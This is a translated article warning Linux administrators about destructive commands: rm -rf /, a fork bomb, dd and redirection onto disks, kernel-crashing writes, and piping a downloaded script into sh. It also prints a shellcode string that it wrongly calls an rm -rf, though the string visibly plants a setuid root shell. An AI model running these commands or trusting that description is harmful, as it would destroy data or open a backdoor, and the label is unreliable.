The Linux commands you should never use | Linux China
All it takes is one stupid move. You can even destroy a company worth billions of dollars, as with an unpatched Apache Struts. -- Steven Vaughan-Nichols
Compiled from | https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
Author | Steven Vaughan-Nichols
Translator | CYLeft
Unless you want to kill your machine.
Spider-Man has a creed: "With great power comes great responsibility." That is also a wise attitude for Linux system administrators.
No, really. Thanks to DevOps communication and collaboration and to cloud orchestration technology, a Linux administrator can control not just one server but thousands of server instances. All it takes is one stupid move. You can even destroy a company worth billions of dollars, as with an unpatched Apache Struts [1].
Failing to apply security patches creates a strategic business problem that goes far above a system administrator's pay grade. But there are also some simple ways to wreck Linux servers that lie entirely in the hands of system administrators. It would be nice to imagine that only new users make these mistakes, but we know better.
The following are some famous commands. Any user with root permissions can use them to cause serious damage to the server.
Warning: do not run these commands in a production environment. They will harm your system. Do not try them at home or in the office.
So proceed!
rm -rf /
Do you want to destroy a Linux system the easy way? You cannot beat this classic, hailed as "the worst in history". It deletes everything. And I mean everything that exists on your system!
Like most Linux commands [2], rm is a core command that is very convenient to use. It will delete even the most stubborn file for you. But two of its parameters can easily get you into trouble: -r, which recursively deletes all subdirectories, and -f, which force-deletes read-only files without confirmation. If you run this command in the root directory, all data on the entire drive is wiped.
If you do this, think about how to explain it to the boss!
Now, you may think, "I would never make such a stupid mistake." My friend, don't be so sure. Learn from this cautionary tale, posted by a system administrator on Reddit [3]:
I have been working in the IT field for many years, but today, as the root user of a Linux system, I ran rm -f in the wrong path.
To make a long story short, that day I needed to copy a lot of directories from one directory to another. As you do, I typed a few cp -R commands to copy the content I needed.
Being clever, I kept tapping the arrow key, looking through the command history for similar commands I could reuse, but they were mixed in with a bunch of other commands.
Anyway, I was typing in Skype, Slack, and WhatsApp web at the same time, while also on the phone with Sage, and my attention was scattered when I entered:
rm -R ./videodir/* ../companyvideodirwith651vidsin/
When a command like that runs, things get out of hand.
The company's videos went along with the deleted files. Fortunately, with a frantic Control-C, the system administrator aborted the command before it deleted too many files. But let this be a warning to you: anyone can make such a mistake.
True, most modern operating systems warn you in striking text before you make this kind of mistake. However, if you are busy or distracted while pounding on the keyboard, you can type your system into a black hole. (Fortunately, perhaps because too many people deleted their entire file system from the root directory, rm by default refuses to delete the root directory unless you manually add the --no-preserve-root parameter!)
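The Reddit command above went wrong because its second argument pointed outside the directory the administrator meant to clean up. As an added example (not part of the original article), the shell functions below preview the targets of an rm -R command line and flag any that resolve to / or outside the current directory; rm_preview and resolve_path are hypothetical helper names.

```shell
#!/bin/sh
# Added example: preview what an "rm -R" command line would touch.
# rm_preview and resolve_path are hypothetical helpers, not standard tools.

# Print the physical absolute path of a file or directory.
resolve_path() {
    if [ -d "$1" ] && [ ! -L "$1" ]; then
        (CDPATH= cd "$1" && pwd -P)
    else
        printf '%s/%s\n' "$(CDPATH= cd "$(dirname "$1")" && pwd -P)" "$(basename "$1")"
    fi
}

# Usage: rm_preview TARGET...
# Lists every target with the number of entries below it. Deletes nothing.
# Returns 1 if any target is / or is not strictly below the current directory.
rm_preview() {
    base=$(pwd -P)
    rc=0
    for target in "$@"; do
        [ -e "$target" ] || [ -L "$target" ] || { echo "skip (missing): $target"; continue; }
        abs=$(resolve_path "$target")
        count=$(find "$target" | wc -l | tr -d ' ')
        case "$abs" in
            /)         echo "REFUSE root: $abs"; rc=1 ;;
            "$base"/*) echo "ok, $count entries: $abs" ;;
            *)         echo "OUTSIDE cwd, $count entries: $abs"; rc=1 ;;
        esac
    done
    return $rc
}
```

Run it with the same arguments you intend to give rm, and only reuse the command line when it returns 0.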
There are also sneakier ways to invoke rm -rf. Consider the following code:
char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
What is this? It is an rm -rf statement written in hexadecimal. Do not run code like this unless you know what it does!
Fork bomb
Since we are talking about some strange code, consider this line:
:(){ :|: & };:
This may look cryptic to you, but to me it is the notorious Bash fork bomb [4]. It starts new Bash shells over and over until your system resources are exhausted and the system crashes.
This should not work on an up-to-date Linux system. Note that I said "should not". I did not say "cannot". When user permissions are set up correctly, Linux can prevent this kind of destructive behavior. Generally, users are limited to the memory available on the machine. But if you run this line (or one of the other Bash fork bomb variants [5]) as the root user, you can still knock the server over until the system is restarted.
Overwriting the hard disk with junk data
Sometimes you want to wipe the data on a hard disk completely. For that job you should use the Darik's Boot and Nuke (DBAN) [6] tool.
But if you just want to mess up your storage, it's easy:
Any command > /dev/hda
By "any command" I mean any command that produces output, such as:
ls -la > /dev/hda
...which sends the directory listing to your primary storage device. Given root permission and enough time, it will overwrite the entire hard disk. This is a good way to start your day in a blind panic, or to turn it into a career-limiting move [7].
Erasing the hard disk!
Another popular method to erase a hard disk is to execute:
dd if=/dev/zero of=/dev/hda
With this command you write data to your hard disk. The dd command takes an endless stream of 0 characters and writes them all to your device.
/dev/zero may sound like a silly idea, but it has real uses. For example, you can use it to fill unused partition space with zeros [8], so that an image of the partition compresses to a smaller size for transfer or archiving.
On the other hand, its close cousin
dd if=/dev/random of=/dev/hda
is good for nothing except ruining your day. If you run this command (don't), your storage is overwritten with random data. As a half-baked way to hide your secret plan to take over the office coffee maker it will do, but the DBAN tool does the job better.
Losing data to /dev/null
Perhaps because our data is precious and we have little confidence in our backups, many of these "never do this!" commands end with a hard disk or other storage repository being wiped. A clear example: another pair of ways to destroy your storage is to run mv / /dev/null or mv ~ /dev/null.
In the former case, as the root user, you send all the data on the drive to the ever-hungry /dev/null. In the latter, you feed only your home directory to the same void. Either way, you will not see your data again unless you restore it from backup.
Heck, the accountants didn't really need the latest accounts receivable files, did they?
Formatting the wrong drive
Sometimes you need to use this command to format the drive:
mkfs.ext3 /dev/hda
...which formats the primary hard drive with the ext3 file system. But wait! You are formatting your primary drive! Weren't you using it?
When you format a drive, make sure the partition you are formatting is the one you mean to format and not one you are using, whether it is an SSD, a flash drive, or a good old iron-oxide disk.
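One way to guard against formatting or overwriting a disk that is in use, which applies equally to the > /dev/hda and dd commands earlier, is to check the mount table first. This is an added example, not from the original article; device_in_use, guarded_mkfs and the sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Added example: refuse to format a disk that is currently mounted.
# device_in_use and guarded_mkfs are hypothetical helper names.

# Constructed sample in /proc/mounts format (not from a real machine).
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
/dev/nvme0n1p1 /data xfs rw 0 0
tmpfs /run tmpfs rw,nosuid 0 0
EOF
}

# Usage: device_in_use DEVICE [MOUNTS_FILE]
# Returns 0 and prints the matches if DEVICE, or a partition on it
# (sda -> sda1, nvme0n1 -> nvme0n1p1), appears as a mounted source.
device_in_use() {
    awk -v dev="$1" '
        function on_disk(src) {
            if (src == dev) return 1
            if (index(src, dev) != 1) return 0
            rest = substr(src, length(dev) + 1)
            # Disk names ending in a digit take a "p" before the partition number.
            if (dev ~ /[0-9]$/) return (rest ~ /^p[0-9]+$/)
            return (rest ~ /^[0-9]+$/)
        }
        on_disk($1) { print $1 " mounted on " $2; hit = 1 }
        END { exit (hit ? 0 : 1) }
    ' "${2:-/proc/mounts}"
}

# Usage: guarded_mkfs DEVICE [MOUNTS_FILE]
# Prints the mkfs command only when the device is not in use; never runs it.
guarded_mkfs() {
    if device_in_use "$1" "${2:-/proc/mounts}" >&2; then
        echo "refusing: $1 is in use" >&2
        return 1
    fi
    echo "mkfs.ext3 $1"
}
```

This only catches direct mounts: a disk used through LVM, RAID or as swap does not appear under its own name in /proc/mounts.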
Kernel crash
Some Linux commands do not take your machine down for long. Others, however, can make the kernel crash. Such failures are usually caused by hardware problems, but you can also bring them on yourself.
After a kernel crash, you have to restart the system to get back to work. In some cases that is merely annoying; in others, such as a production environment under heavy load, it is a big problem. Here are some examples:
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
These will cause the kernel to crash.
Never run a command when you do not know what it does. Which reminds me...
Watch out for unknown scripts
Young or lazy system administrators like to borrow other people's scripts. Why reinvent the wheel? So they find a cool script that promises to check all their backups automatically, and they run it like this:
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
This downloads the script and sends it straight to the shell to run. No big deal, right? Wrong. The script may have been infected with malware. Sure, Linux is generally safer than most operating systems, but if you run unknown code as the root user, anything can happen. The danger lies not only in malware but also in the script author's stupidity. You may well be bitten by undebugged code because you did not take the time to read it.
Do you think you would never do that? Then tell me, what about the container images you run in Docker [9]? Do you know what they are running? I have seen too many system administrators run them without verifying what is in the container. Please don't.
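A safer routine than piping wget into sh is to download the script to a file, read it, record its SHA-256, and later run only a copy whose digest still matches. The functions below are an added example, not from the original article; pin_script and run_if_reviewed are hypothetical names, and sha256sum from GNU coreutils is assumed.

```shell
#!/bin/sh
# Added example: run a downloaded script only if it is byte-for-byte the
# version that was read and approved. Helper names are hypothetical.
#
# Intended workflow (the download itself is not done here):
#   1. wget -O GreatScript.sh <url>      save to a file, do not pipe to sh
#   2. read GreatScript.sh
#   3. pin=$(pin_script GreatScript.sh)  record the digest of what you read
#   4. run_if_reviewed GreatScript.sh "$pin"

# Usage: pin_script FILE
# Prints the SHA-256 digest of FILE in hex.
pin_script() {
    sha256sum "$1" | awk '{ print $1 }'
}

# Usage: run_if_reviewed FILE EXPECTED_SHA256 [ARGS...]
# Executes FILE with sh only when its digest equals EXPECTED_SHA256.
# Returns 1 without executing anything on a mismatch.
run_if_reviewed() {
    file=$1
    expected=$2
    shift 2
    actual=$(pin_script "$file") || return 1
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: got $actual" >&2
        return 1
    fi
    sh "$file" "$@"
}
```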
End
The moral of these stories is simple. On your Linux system, you have enormous control. You can make your server do almost anything. But when you use your permissions, make sure you check carefully what you are doing. If you don't, you destroy not just your server, but your job or even your company. Like Spider-Man, use your power responsibly.
Have I missed anything? Tell me at @sjvn [10] or @enterprisenxt [11] which Linux commands are on your "never run this!" list [12].
Via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
Author: Steven Vaughan-Nichols [14] Translator: CYLeft Proofreader: wxy
This article was originally compiled by LCTT and is proudly presented by Linux China.
Copyright Disclaimer: This article is an original article by the blogger and cannot be reproduced without the permission of the blogger. Http://blog.csdn.net/F8qG7f9YD02Pe/article/details/78988323